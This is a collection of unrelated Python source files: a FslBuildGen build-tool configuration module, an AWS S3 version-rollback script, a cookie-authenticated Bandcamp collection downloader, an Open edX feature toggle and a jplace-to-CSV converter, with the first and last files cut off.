from FslBuildGen.Xml.ToolConfig.XmlConfigPackageConfiguration import XmlConfigPackageConfiguration
from FslBuildGen.Xml.ToolConfig.XmlConfigPackageLocation import FakeXmlConfigPackageLocation
from FslBuildGen.Xml.ToolConfig.XmlConfigPackageLocation import XmlConfigPackageLocation
from FslBuildGen.Xml.XmlProjectRootConfigFile import XmlConfigCompilerConfiguration
from FslBuildGen.Xml.XmlProjectRootConfigFile import XmlConfigFileAddRootDirectory
from FslBuildGen.Xml.XmlProjectRootConfigFile import XmlExperimental
from FslBuildGen.Xml.XmlProjectRootConfigFile import XmlProjectRootConfigFile
from FslBuildGen.Xml.XmlToolConfigFile import XmlConfigContentBuilder
from FslBuildGen.Xml.XmlToolConfigFile import XmlConfigContentBuilderConfiguration
from FslBuildGen.Xml.XmlToolConfigFile import XmlConfigFileAddTemplateImportDirectory
from FslBuildGen.Xml.XmlToolConfigFile import XmlConfigFileTemplateFolder
from FslBuildGen.Xml.XmlToolConfigFile import XmlToolConfigFile
class ToolConfigCompilerConfiguration(object):
def __init__(self, basicConfig: BasicConfig, basedUponXML: XmlConfigCompilerConfiguration) -> None:
super(ToolConfigCompilerConfiguration, self).__init__()
self.BasedOn = basedUponXML
self.Name = self.BasedOn.Name
self.Id = self.BasedOn.Id
self.Platform = self.BasedOn.Platform
defaultVersion = VisualStudioVersion.TryParse(self.BasedOn.DefaultVersion)
if defaultVersion is None:
raise XmlUnsupportedCompilerVersionException(self.BasedOn.XMLElement, self.BasedOn.Name, self.BasedOn.DefaultVersion, ', '.join(str(x) for x in VisualStudioVersion.AllEntries))
self.DefaultVersion = defaultVersion
class ToolConfigTemplateFolder(object):
def __init__(self, basicConfig: BasicConfig, basedUponXML: XmlConfigFileTemplateFolder) -> None:
super(ToolConfigTemplateFolder, self).__init__()
self.BasedOn = basedUponXML
self.Name = self.BasedOn.Name
variableProcessor = VariableProcessor(basicConfig)
self.ResolvedPath = variableProcessor.ResolveAbsolutePathWithLeadingEnvironmentVariablePathAsDir(self.Name)
class NewProjectTemplateRootDirectory(object):
def __init__(self, basicConfig: BasicConfig, basedUponXML: XmlConfigFileAddNewProjectTemplatesRootDirectory) -> None:
super(NewProjectTemplateRootDirectory, self).__init__()
self.BasedOn = basedUponXML
self.Id = basedUponXML.Id
self.Name = basedUponXML.Name
self.DynamicName = basedUponXML.Name
variableProcessor = VariableProcessor(basicConfig)
# NOTE: workaround Union of tuples not being iterable bug in mypy https://github.com/python/mypy/issues/1575
tupleResult = variableProcessor.TryExtractLeadingEnvironmentVariableNameAndPath(self.DynamicName, True)
env = tupleResult[0]
remainingPath = tupleResult[1]
if env is None:
raise Exception("Root dirs are expected to contain environment variables '{0}'".format(self.DynamicName))
resolvedPath = IOUtil.GetEnvironmentVariableForDirectory(env) + remainingPath
self.BashName = '${0}{1}'.format(env, remainingPath)
self.DosName = '%{0}%{1}'.format(env, remainingPath)
self.ResolvedPath = IOUtil.ToUnixStylePath(resolvedPath)
self.ResolvedPathEx = "{0}/".format(self.ResolvedPath) if len(self.ResolvedPath) > 0 else ""
self.__EnvironmentVariableName = env
class ToolConfigDirectory(object):
def __init__(self, basicConfig: BasicConfig, basedUponXML: XmlConfigFileAddTemplateImportDirectory) -> None:
super(ToolConfigDirectory, self).__init__()
self.BasedOn = basedUponXML
self.Name = self.BasedOn.Name
variableProcessor = VariableProcessor(basicConfig)
# NOTE: workaround Union of tuples not being iterable bug in mypy https://github.com/python/mypy/issues/1575
tupleResult = variableProcessor.TrySplitLeadingEnvironmentVariablesNameAndPath(self.Name)
envName = tupleResult[0]
rest = tupleResult[1]
if envName is None:
raise Exception("Template import dirs are expected to contain environment variables")
self.DecodedName = envName
self.BashName = IOUtil.Join('$' + self.DecodedName, rest)
self.DosName = IOUtil.Join('%' + self.DecodedName + '%', rest)
if self.Name is None:
raise XmlException2(basedUponXML.XmlElement, "Dirs are expected to contain environment variables")
self.ResolvedPath = IOUtil.Join(IOUtil.GetEnvironmentVariableForDirectory(self.DecodedName), rest)
self.ResolvedPathEx = "{0}/".format(self.ResolvedPath) if len(self.ResolvedPath) > 0 else ""
# TODO: improve interface, dont allow so many None (remove None from rootDirs and projectRootDirectory)
class ToolConfigLocation(object):
def __init__(self, basicConfig: BasicConfig,
rootDirs: Optional[List[ToolConfigRootDirectory]],
basedUponXML: XmlConfigPackageLocation,
projectRootDirectory: Optional[str],
resolvedPath: Optional[str] = None) -> None:
super(ToolConfigLocation, self).__init__()
if rootDirs is None or projectRootDirectory is None:
if rootDirs is not None or projectRootDirectory is not None:
raise Exception("When rootDirs is none, then the projectRootDirectory must be none")
self.BasedOn = basedUponXML
self.Id = basedUponXML.Id
self.Name = basedUponXML.Name
if resolvedPath is not None:
self.ResolvedPath = IOUtil.NormalizePath(resolvedPath)
else:
if rootDirs is None or projectRootDirectory is None:
raise Exception("When resolvedPath is None then rootDirs and projectRootDirectory can not be None")
self.ResolvedPath = self.__ResolvePath(basicConfig, rootDirs, self.Name, projectRootDirectory)
self.ResolvedPathEx = "{0}/".format(self.ResolvedPath) if len(self.ResolvedPath) > 0 else ""
self.ScanMethod = basedUponXML.ScanMethod
def __ResolvePath(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory], entryName: str, projectRootDirectory: str) -> str:
rootDir = self.__LocateRootDir(basicConfig, rootDirs, entryName, projectRootDirectory)
return entryName.replace(rootDir.Name, rootDir.ResolvedPath)
def __LocateRootDir(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory], entryName: str, projectRootDirectory: str) -> ToolConfigRootDirectory:
if projectRootDirectory is None or not entryName.startswith(MagicStrings.ProjectRoot):
for rootDir in rootDirs:
if entryName.startswith(rootDir.Name):
return rootDir
else:
# Lets try to locate a root directory which the project is based in,
# then use it to dynamically add a new allowed root directory based on the project file location
for rootDir in rootDirs:
if projectRootDirectory == rootDir.ResolvedPath:
return ToolConfigRootDirectory(basicConfig, None, rootDir, MagicStrings.ProjectRoot, rootDir.ResolvedPath)
elif projectRootDirectory.startswith(rootDir.ResolvedPathEx):
dynamicRootDir = projectRootDirectory[len(rootDir.ResolvedPathEx):]
dynamicRootDir = "{0}/{1}".format(rootDir.Name, dynamicRootDir)
return ToolConfigRootDirectory(basicConfig, None, rootDir, MagicStrings.ProjectRoot, dynamicRootDir)
raise Exception("Path '{0}' is not based on one of the valid root directories {1}".format(entryName, ", ".join(Util.ExtractNames(rootDirs))))
class ToolConfigPackageLocationBlacklistEntry(object):
def __init__(self, sourceRootPath: str, relativePath: str) -> None:
self.RootDirPath = IOUtil.NormalizePath(sourceRootPath)
self.RelativeDirPath = IOUtil.NormalizePath(relativePath)
self.AbsoluteDirPath = IOUtil.Join(sourceRootPath, relativePath)
# TODO: improve interface, dont allow so many None (remove None from rootDirs and projectRootDirectory)
class ToolConfigPackageLocation(ToolConfigLocation):
def __init__(self, basicConfig: BasicConfig,
rootDirs: Optional[List[ToolConfigRootDirectory]],
basedUponXML: XmlConfigPackageLocation,
projectRootDirectory: Optional[str],
resolvedPath: Optional[str] = None) -> None:
super(ToolConfigPackageLocation, self).__init__(basicConfig, rootDirs, basedUponXML, projectRootDirectory, resolvedPath)
self.Blacklist = [ToolConfigPackageLocationBlacklistEntry(self.ResolvedPath, entry.Name) for entry in basedUponXML.Blacklist]
class ToolConfigPackageConfigurationLocationSetup(object):
def __init__(self, name: str, scanMethod: Optional[int] = None, blacklist: Optional[List[str]] = None) -> None:
self.Name = name
self.ScanMethod = scanMethod
self.Blacklist = blacklist
ToolConfigPackageConfigurationAddLocationType = Union[str, ToolConfigPackageConfigurationLocationSetup, List[str], List[ToolConfigPackageConfigurationLocationSetup]]
class ToolConfigPackageConfiguration(object):
def __init__(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory],
basedUponXML: XmlConfigPackageConfiguration, configFileName: str, projectRootDirectory: str) -> None:
super(ToolConfigPackageConfiguration, self).__init__()
self.__basicConfig = basicConfig
self.BasedOn = basedUponXML
self.Name = basedUponXML.Name
self.Preload = basedUponXML.Preload
self.Locations = self.__ResolveLocations(basicConfig, rootDirs, basedUponXML.Locations, configFileName, projectRootDirectory)
def ClearLocations(self) -> None:
self.Locations = []
def AddLocations(self, newRootLocations: ToolConfigPackageConfigurationAddLocationType) -> None:
# done in two steps to make mypy happy
if isinstance(newRootLocations, str):
newRootLocations = [newRootLocations]
if isinstance(newRootLocations, ToolConfigPackageConfigurationLocationSetup):
newRootLocations = [newRootLocations]
for rootLocation in newRootLocations:
if isinstance(rootLocation, str):
resolvedPath = rootLocation
fakeXml = FakeXmlConfigPackageLocation(self.__basicConfig, rootLocation)
elif isinstance(rootLocation, ToolConfigPackageConfigurationLocationSetup):
resolvedPath = rootLocation.Name
fakeXml = FakeXmlConfigPackageLocation(self.__basicConfig, rootLocation.Name, rootLocation.ScanMethod, rootLocation.Blacklist)
else:
raise Exception("Unsupported type")
self.Locations.append(ToolConfigPackageLocation(self.__basicConfig, None, fakeXml, None, resolvedPath))
def __ResolveLocations(self, basicConfig: BasicConfig,
rootDirs: List[ToolConfigRootDirectory], locations: List[XmlConfigPackageLocation],
configFileName: str, projectRootDirectory: str) -> List[ToolConfigPackageLocation]:
# Check for unique names and
# convert to a ToolConfigPackageLocation list
res = [] # List[ToolConfigPackageLocation]
uniqueLocationIds = set() # type: Set[str]
for location in locations:
if not location.Id in uniqueLocationIds:
uniqueLocationIds.add(location.Id)
packageLocation = ToolConfigPackageLocation(basicConfig, rootDirs, location, projectRootDirectory)
res.append(packageLocation)
else:
raise DuplicatedConfigPackageLocation(location.Name, configFileName)
# We sort it so that the longest paths come first meaning we will always find the most exact match first
# if searching from the front to the end of the list and comparing to 'startswith'
res.sort(key=lambda s: -len(s.ResolvedPath))
return res
class ToolContentBuilder(object):
def __init__(self, basedUponXML: XmlConfigContentBuilder) -> None:
super(ToolContentBuilder, self).__init__()
self.BasedOn = basedUponXML
self.Name = basedUponXML.Name
self.Executable = basedUponXML.Executable
self.Parameters = basedUponXML.Parameters
self.FeatureRequirements = basedUponXML.FeatureRequirements
self.DefaultExtensions = basedUponXML.DefaultExtensions
self.Description = basedUponXML.Description
class ToolConfigContentBuilderConfiguration(object):
def __init__(self, basedUponXML: XmlConfigContentBuilderConfiguration, configFileName: str) -> None:
super(ToolConfigContentBuilderConfiguration, self).__init__()
self.BasedOn = basedUponXML
self.ContentBuilders = self.__ResolveContentBuilders(basedUponXML.ContentBuilders, configFileName) if basedUponXML else []
def __ResolveContentBuilders(self, contentBuilders: List[XmlConfigContentBuilder], configFileName: str) -> List[ToolContentBuilder]:
uniqueNames = set() # type: Set[str]
res = [] # type: List[ToolContentBuilder]
for contentBuilder in contentBuilders:
newContentBuilder = ToolContentBuilder(contentBuilder)
if not newContentBuilder.Name in uniqueNames:
uniqueNames.add(newContentBuilder.Name)
res.append(newContentBuilder)
else:
raise DuplicatedConfigContentBuilder(newContentBuilder.Name, configFileName)
return res
class ToolConfig(object):
def __init__(self, basicConfig: BasicConfig, filename: str, projectRootConfig: XmlProjectRootConfigFile) -> None:
super(ToolConfig, self).__init__()
basedUponXML = XmlToolConfigFile(basicConfig, filename, projectRootConfig)
self.BasedOn = basedUponXML
self.GenFileName = basedUponXML.GenFileName.Name
self.RootDirectories = self.__ResolveRootDirectories(basicConfig, basedUponXML.RootDirectories, filename)
self.TemplateImportDirectories = self.__ResolveDirectories(basicConfig, basedUponXML.TemplateImportDirectories)
self.PackageConfiguration = self.__ResolvePackageConfiguration(basicConfig, self.RootDirectories, basedUponXML.PackageConfiguration, filename, projectRootConfig.RootDirectory)
self.TemplateFolder = ToolConfigTemplateFolder(basicConfig, basedUponXML.TemplateFolder)
self.NewProjectTemplateRootDirectories = self.__ResolveNewProjectTemplateRootDirectories(basicConfig, basedUponXML.NewProjectTemplateRootDirectories)
self.ContentBuilderConfiguration = ToolConfigContentBuilderConfiguration(basedUponXML.ContentBuilderConfiguration, filename) if basedUponXML.ContentBuilderConfiguration is not None else None
self.UnitTestPath = self.__TryResolveUnitTestPath()
self.DefaultPackageLanguage = projectRootConfig.DefaultPackageLanguage
self.DefaultCompany = projectRootConfig.DefaultCompany
self.RequirePackageCreationYear = projectRootConfig.RequirePackageCreationYear
self.ProjectRootConfig = projectRootConfig
self.CompilerConfigurationDict = self.__ProcessCompilerConfiguration(basicConfig, basedUponXML.CompilerConfiguration)
self.RequirementTypes = [PackageRequirementTypeString.Extension, PackageRequirementTypeString.Feature]
self.Experimental = self.__ResolveExperimental(basicConfig, self.RootDirectories, basedUponXML.Experimental, filename, projectRootConfig.RootDirectory) # type: Optional[ToolConfigExperimental]
def GetVisualStudioDefaultVersion(self) -> int:
visualStudioId = CompilerNames.VisualStudio.lower()
if visualStudioId in self.CompilerConfigurationDict:
return self.CompilerConfigurationDict[visualStudioId].DefaultVersion
return VisualStudioVersion.DEFAULT
def TryLegacyToPath(self, path: Optional[str]) -> Optional[str]:
if path is None:
return None
return self.ToPath(path)
def ToPath(self, path: str) -> str:
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
for rootDir in self.RootDirectories:
if path.startswith(rootDir.ResolvedPathEx):
lenRootPath = len(rootDir.ResolvedPathEx)
path = path[lenRootPath:]
return rootDir.Name + "/" + Util.UTF8ToAscii(path)
elif path == rootDir.ResolvedPath:
return rootDir.Name + "/"
raise UsageErrorException("ERROR: the folder '{0}' does not reside inside one of the root dirs".format(path))
def TryFindRootDirectory(self, path: Optional[str]) -> Optional[ToolConfigRootDirectory]:
""" Try to find the nearest root directory """
if path is None:
return None
for rootDir in self.RootDirectories:
if path.startswith(rootDir.ResolvedPathEx) or path == rootDir.ResolvedPath:
return rootDir
return None
def ToBashPath(self, path: str) -> str:
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
for rootDir in self.RootDirectories:
if path.startswith(rootDir.ResolvedPathEx):
lenRootPath = len(rootDir.ResolvedPathEx)
path = path[lenRootPath:]
return rootDir.BashName + "/" + Util.UTF8ToAscii(path)
elif path == rootDir.ResolvedPath:
return rootDir.Name + "/"
raise UsageErrorException("ERROR: the folder '{0}' does not reside inside one of the root dirs".format(path))
def TryLegacyToBashPath(self, path: Optional[str]) -> Optional[str]:
if path is None:
return None
return self.ToBashPath(path)
def ToBashPathDirectConversion(self, path: str) -> str:
""" This does not make the path relative to a root path """
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
path = Util.ChangeToBashEnvVariables(path)
return Util.UTF8ToAscii(path).replace('\\', '/')
def TryLegacyToBashPathDirectConversion(self, path: Optional[str]) -> Optional[str]:
""" This does not make the path relative to a root path """
if path is None:
return None
return self.ToBashPathDirectConversion(path)
def ToDosPath(self, path: str) -> str:
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
for rootDir in self.RootDirectories:
if path.startswith(rootDir.ResolvedPathEx):
lenRootPath = len(rootDir.ResolvedPathEx)
path = path[lenRootPath:]
tmp = rootDir.DosName + "/" + Util.UTF8ToAscii(path)
return tmp.replace('/', '\\')
elif path == rootDir.ResolvedPath:
tmp = rootDir.Name + "/"
return tmp.replace('/', '\\')
raise UsageErrorException("ERROR: the folder '{0}' does not reside inside one of the root dirs".format(path))
def TryLegacyToDosPath(self, path: Optional[str]) -> Optional[str]:
if path is None:
return None
return self.ToDosPath(path)
def ToDosPathDirectConversion(self, path: str) -> str:
""" This does not make the path relative to a root path """
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
path = Util.ChangeToDosEnvironmentVariables(path)
return Util.UTF8ToAscii(path).replace('/', '\\')
def TryLegacyToDosPathDirectConversion(self, path: Optional[str]) -> Optional[str]:
""" This does not make the path relative to a root path """
if path is None:
return None
return self.ToDosPathDirectConversion(path)
def __ResolveNewProjectTemplateRootDirectories(self, basicConfig: BasicConfig,
newProjectTemplateRootDirectories: List[XmlConfigFileAddNewProjectTemplatesRootDirectory]) -> List[NewProjectTemplateRootDirectory]:
uniqueIdDict = {} # type: Dict[str, NewProjectTemplateRootDirectory]
rootDirs = [] # type: List[NewProjectTemplateRootDirectory]
for rootDir in newProjectTemplateRootDirectories:
toolRootDir = NewProjectTemplateRootDirectory(basicConfig, rootDir)
if not toolRootDir.Id in uniqueIdDict:
uniqueIdDict[toolRootDir.Id] = toolRootDir
rootDirs.append(toolRootDir)
else:
raise DuplicatedNewProjectTemplatesRootPath(toolRootDir.Name, uniqueIdDict[toolRootDir.Id].Name, toolRootDir.Name)
# We sort it so that the longest paths come first meaning we will always find the most exact match first
# if searching from the front to the end of the list and comparing to 'startswith'
rootDirs.sort(key=lambda s: -len(s.ResolvedPathEx))
return rootDirs
def __ResolveRootDirectories(self, basicConfig: BasicConfig,
rootDirectories: List[XmlConfigFileAddRootDirectory],
configFileName: str) -> List[ToolConfigRootDirectory]:
uniqueNames = set() # type: Set[str]
rootDirs = [] # type: List[ToolConfigRootDirectory]
for rootDir in rootDirectories:
toolRootDir = ToolConfigRootDirectory(basicConfig, rootDir)
if not toolRootDir.Name in uniqueNames:
uniqueNames.add(toolRootDir.Name)
rootDirs.append(toolRootDir)
else:
raise DuplicatedConfigRootPath(toolRootDir.Name, configFileName)
# We sort it so that the longest paths come first meaning we will always find the most exact match first
# if searching from the front to the end of the list and comparing to 'startswith'
rootDirs.sort(key=lambda s: -len(s.ResolvedPathEx))
return rootDirs
def __ResolveDirectories(self, basicConfig: BasicConfig, directories: List[XmlConfigFileAddTemplateImportDirectory]) -> List[ToolConfigDirectory]:
dirs = [] # type: List[ToolConfigDirectory]
for dirEntry in directories:
dirs.append(ToolConfigDirectory(basicConfig, dirEntry))
return dirs
def __ResolvePackageConfiguration(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory],
packageConfiguration: Dict[str, XmlConfigPackageConfiguration],
configFileName: str, projectRootDirectory: str) -> Dict[str, ToolConfigPackageConfiguration]:
configs = {} # type Dict[str, ToolConfigPackageConfiguration]
for packageConfig in list(packageConfiguration.values()):
resolvedConfig = ToolConfigPackageConfiguration(basicConfig, rootDirs, packageConfig, configFileName, projectRootDirectory)
configs[resolvedConfig.Name] = resolvedConfig
return configs
def __ResolveExperimental(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory],
experimental: Optional[XmlExperimental],
configFileName: str, projectRootDirectory: str) -> Optional[ToolConfigExperimental]:
if experimental is None:
return None
return ToolConfigExperimental(basicConfig, rootDirs, experimental, configFileName, projectRootDirectory)
def __TryResolveUnitTestPath(self) -> Optional[str]:
path = os.environ.get("FSL_GRAPHICS_INTERNAL")
if path is None:
return None
return IOUtil.Join(path, "Tools/FslBuildGen/FslBuildGen/UnitTest/TestFiles")
def __ProcessCompilerConfiguration(self, basicConfig: BasicConfig,
xmlCompilerConfiguration: List[XmlConfigCompilerConfiguration]) -> Dict[str, ToolConfigCompilerConfiguration]:
result = {} # type: Dict[str, ToolConfigCompilerConfiguration]
for config in xmlCompilerConfiguration:
if config.Id in result:
raise XmlDuplicatedCompilerConfigurationException(result[config.Id].BasedOn.XMLElement, result[config.Id].Name, config.XMLElement, config.Name)
elif config.Name == CompilerNames.VisualStudio:
result[config.Id] = ToolConfigCompilerConfiguration(basicConfig, config)
else:
msg = "CompilerConfiguration name: '{0}' is not currently supported, so entry is ignored".format(config.Name)
basicConfig.LogPrint(msg)
return result
|
#!/usr/bin/python
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import json
import logging
import os
import argparse
from common import PARTITION_TO_MAIN_REGION, PARTITIONS, retrieve_sts_credentials
from s3_factory import S3DocumentManager
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s [%(name)s] %(message)s")
def execute_rollback(rollback_file_path, sts_credentials, deploy):
with open(rollback_file_path) as rollback_file:
rollback_data = json.load(rollback_file)
logging.info("Loaded rollback data:\n%s", json.dumps(rollback_data, indent=2))
# Rollback file format
# {
# "s3_bucket": {
# "region": "us-east-1",
# "files": {
# "object_key": "version_id"
# }
# },
# ...
# }
for bucket_name, bucket_rollback_data in rollback_data.items():
region = bucket_rollback_data["region"]
for file, version in bucket_rollback_data["files"].items():
object_manager = S3DocumentManager(region, sts_credentials.get(region))
object_manager.revert_object(bucket_name, file, version, not deploy)
def _parse_args():
def _aws_credentials_type(value):
return tuple(value.strip().split(","))
def _json_file_type(value):
if not os.path.isfile(value):
raise argparse.ArgumentTypeError("'{0}' is not a valid file".format(value))
with open(value) as rollback_file:
json.load(rollback_file)
return value
parser = argparse.ArgumentParser(description="Rollback S3 files to a previous version")
parser.add_argument(
"--rollback-file-path",
help="Path to file containing the rollback information",
type=_json_file_type,
required=True,
)
parser.add_argument(
"--deploy",
action="store_true",
help="If deploy is false, we will perform a dryrun and no file will be pushed to buckets",
default=False,
required=False,
)
parser.add_argument(
"--credentials",
help="STS credential endpoint, in the format <region>,<endpoint>,<ARN>,<externalId>."
"Could be specified multiple times",
required=False,
nargs="+",
type=_aws_credentials_type,
default=[],
)
parser.add_argument(
"--partition", choices=PARTITIONS, help="AWS Partition where to update the files", required=True
)
args = parser.parse_args()
return args
def main():
args = _parse_args()
logging.info("Parsed cli args: %s", vars(args))
regions = set()
with open(args.rollback_file_path) as rollback_file:
rollback_data = json.load(rollback_file)
for bucket in rollback_data.keys():
regions.add(rollback_data[bucket]["region"])
sts_credentials = retrieve_sts_credentials(args.credentials, PARTITION_TO_MAIN_REGION[args.partition], regions)
execute_rollback(args.rollback_file_path, sts_credentials, args.deploy)
if __name__ == "__main__":
main()
|
from docopt import docopt
from os.path import isfile
from datetime import datetime
import locale
import asyncio
import json
from colorama import Fore, ansi
from .bandcamp import Bandcamp
DOC = """
Camp Collective.
Usage:
camp-collective -c=<cookie>... [options] download-collection [<target-directory>]
Options:
--cookie=<cookie> -c Cookies used to authenticate with Bandcamp (split by ; and content url encoded)
--parallel=<amount> -p Amount of items that should be downloaded parallel [default: 5]
--status=<status-file> -s Status file to save the status in of downloaded releases, so we don't over do it
--format=<file-format> -f File format to download (%s) [default: flac]
--after=<date> Only download tralbums that are purchased after given date, given in YYYY-MM-DD
""" % ', '.join(Bandcamp.FORMATS.keys())
data = docopt(DOC)
async def _main(data):
# fuck you, unlocales you locale
locale.setlocale(locale.LC_ALL, 'C')
cookie_string = ';'.join(data['--cookie']).strip(' ;')
def parse_cookie(string):
kv = string.split('=', maxsplit=1)
if len(kv) == 1:
kv.append(None)
return kv
cookie_dict = dict([parse_cookie(cookie_comb)
for cookie_comb in cookie_string.split(';')])
bc = Bandcamp(cookies=cookie_dict)
after = None
if data['--after']:
after = datetime.strptime(data['--after'], '%Y-%m-%d')
if data['download-collection']:
if data['<target-directory>']:
bc.download_directory = data['<target-directory>']
await download_collection(bc, parallel=int(data['--parallel']), status_file=data['--status'],
file_format=data['--format'], after=after)
async def do_login(bc):
await bc.load_user_data()
if not bc.is_logged_in():
print(Fore.RED + "No user logged in with given cookies" + Fore.RESET)
exit(1)
print("{cg}Logged in as {cb}{bc.user[name]}{cg} ({cc}{bc.user[username]}{cg}){r}".format(
cy=Fore.YELLOW, cc=Fore.CYAN, cg=Fore.GREEN, cb=Fore.BLUE, r=Fore.RESET, bc=bc
))
def on_executor(func):
async def wrapper(*args, **kwargs):
return await asyncio.get_event_loop().run_in_executor(None, lambda: func(*args, **kwargs))
return wrapper
@on_executor
def read_file_in_memory(filename):
with open(filename, 'r') as fp:
return fp.read()
@on_executor
def write_contents_to_file(filename, data):
with open(filename, 'w') as fp:
fp.write(data)
async def download_collection(bc, parallel, status_file=None, file_format=None, after=None):
file_format = file_format.lower()
if file_format not in Bandcamp.FORMATS.keys():
print(Fore.RED + "Please use one of the following formats: " + Fore.CYAN
+ (Fore.RED + ', ' + Fore.CYAN).join(Bandcamp.FORMATS.keys()) + Fore.RESET)
exit(1)
await do_login(bc)
coll = await bc.load_own_collection(full=True)
working = 0
done = 0
failed = 0
failed_items = []
if status_file is not None:
if not isfile(status_file):
try:
with open(status_file, 'w') as fp:
fp.write('{}')
except RuntimeError as e:
print("Can't write status file (%s)" % status_file)
exit(1)
json_status = await read_file_in_memory(status_file)
status = json.loads(json_status)
else:
status = {}
queue = [item for item in coll.items.values()
if (item.id not in status or not status[item.id]) and (after is None or item.purchased is None or after < item.purchased)]
async def print_progress():
nonlocal working, done, failed
last_height = 0
step = 0
# But it looks sexy in the console!
while len(queue) > 0 or working > 0:
message = (ansi.clear_line() + ansi.Cursor.UP(1)) * last_height
message += '{clear}\r{cy}Queued: {cg}{nq}{cy} Working: {cg}{nw}' \
'{cy} Done: {cg}{nd}{cy} Failed: {cr}{nf}{r}\n\n'.format(
clear=ansi.clear_line(), cy=Fore.YELLOW,
cg=Fore.GREEN, cr=Fore.RED, r=Fore.RESET,
nq=len(queue), nw=working, nd=done, nf=failed)
for val in bc.download_status.values():
if val['status'] not in ('downloading', 'converting', 'requested'):
continue
message += Fore.YELLOW + '[' + Fore.BLUE
if val['status'] in ('converting', 'requested'):
bar = '.. .. ..'
message += bar[step:step + 4]
elif val['status'] == 'downloading':
message += "{:>4.0%}".format(val['downloaded_size'] / val['size'])
message += "{cy}] {cc}{v[item].name}{cy} by {cg}{v[item].artist}{r}\n".format(
cy=Fore.YELLOW, cc=Fore.CYAN, cg=Fore.GREEN, r=Fore.RESET, v=val
)
last_height = message.count("\n")
print(message, end="")
step = (step + 1) % 3
await asyncio.sleep(0.5)
async def write_status():
while len(queue) > 0 or working > 0:
json_data = json.dumps(status)
await write_contents_to_file(status_file, json_data)
await asyncio.sleep(5)
json_data = json.dumps(status)
await write_contents_to_file(status_file, json_data)
async def download_item(item):
nonlocal done, failed
res = await bc.download_item(item, file_format)
done += 1
if res is None:
failed += 1
failed_items.append(item)
else:
item_dict = item.as_dict()
del item_dict['download_url']
item_dict['file'] = res
item_dict['quality'] = file_format
status[item.id] = item_dict
async def queue_download():
nonlocal working
working += 1
while len(queue) > 0:
item = queue.pop()
await download_item(item)
working -= 1
downloaders = []
for i in range(min(len(queue), parallel)):
downloaders.append(queue_download())
progress_checkers = [print_progress()]
if status_file is not None:
progress_checkers.append(write_status())
await asyncio.gather(*downloaders, *progress_checkers)
if failed > 0:
print(Fore.YELLOW + '\nThe following items failed:')
for item in failed_items:
print("{cc}{i.name}{cy} by {cg}{i.artist}{cy}: {cb}{i.url}{r}".format(
cy=Fore.YELLOW, cc=Fore.CYAN, cg=Fore.GREEN, cb=Fore.BLUE, r=Fore.RESET, i=item,
))
print(Fore.GREEN + 'Done!' + Fore.RESET)
loop = asyncio.get_event_loop()
loop.run_until_complete(_main(data))
loop.close()
|
"""
Toggles for the Agreements app
"""
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.waffle_utils import CourseWaffleFlag
# .. toggle_name: agreements.enable_integrity_signature
# .. toggle_implementation: CourseWaffleFlag
# .. toggle_default: False
# .. toggle_description: Supports rollout of the integrity signature feature
# .. toggle_use_cases: temporary, open_edx
# .. toggle_creation_date: 2021-05-07
# .. toggle_target_removal_date: None
# .. toggle_warnings: None
# .. toggle_tickets: MST-786
ENABLE_INTEGRITY_SIGNATURE = CourseWaffleFlag( # lint-amnesty, pylint: disable=toggle-missing-annotation
'agreements', 'enable_integrity_signature', __name__,
)
def is_integrity_signature_enabled(course_key):
if isinstance(course_key, str):
course_key = CourseKey.from_string(course_key)
return ENABLE_INTEGRITY_SIGNATURE.is_enabled(course_key)
|
#!/usr/bin/env python
import argparse
import logging
import csv
import json
import sys
import gzip
import bz2
import os
logging.basicConfig(
format='%(message)s',
level=logging.INFO)
log = logging.getLogger(__name__)
# Handle py2 and py3 file differences
if sys.version_info[0] == 3:
from io import IOBase
file = IOBase
def open_file(path):
if not os.path.exists(path):
log.error("%s does not exist", path)
return None
# Implicit else
suffix = path.split('.')[-1].lower().strip()
if suffix == 'gz':
return gzip.open(path, mode='rt')
elif suffix == 'bz2':
return bz2.BZ2File(path, mode='r')
else:
return open(path, mode='rt')
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'jplace',
metavar='XXX.jplace[.bz2|.gz]',
help='jplace file (default is standard in)',
nargs='?',
default=sys.stdin,
)
parser.add_argument(
'--csv',
metavar='XXX.csv',
help='CSV file with stats (default is standard out)',
nargs='?',
default=sys.stdout,
)
args = parser.parse_args()
if isinstance(args.csv, file):
csv_h = args.csv
else:
try:
csv_h = open(args.csv, mode='wt')
except Exception as e:
log.error("Failed to open %s for writing.", args.csv)
sys.exit(-1)
# Implicit else we were able to open the csv file
if isinstance(args.jplace, file):
jplace_h = args.jplace
else:
jplace_h = open_file(args.jplace)
if jplace_h is None:
log.error("Could not open jplace file. Exiting")
sys.exit(-1)
# Implicit else, parse the json from the file handle
try:
jplace = json.load(jplace_h)
jplace_h.close()
except Exception as e:
log.error("Failed to parse JSON with error {}".format(e))
sys.exit(-1)
# Implcit else we have something JSON can work with
try:
assert('fields' in jplace.keys()), "JSON Missing fields entry"
assert('placements' in jplace.keys()), "JSON Missing placements entry"
except AssertionError as e:
log.error("Malformed jplace, {}".format(e))
sys.exit(-1)
# Implicit else we have some data...
# Associate a field name with an index
field_idx = {
fn: i
for i, fn in enumerate(jplace['fields'])
}
log.info("There are %d placements", len(jplace['placements']))
writer = csv.writer(csv_h)
writer.writerow([
"seq_id",
"richness",
'min_distance'
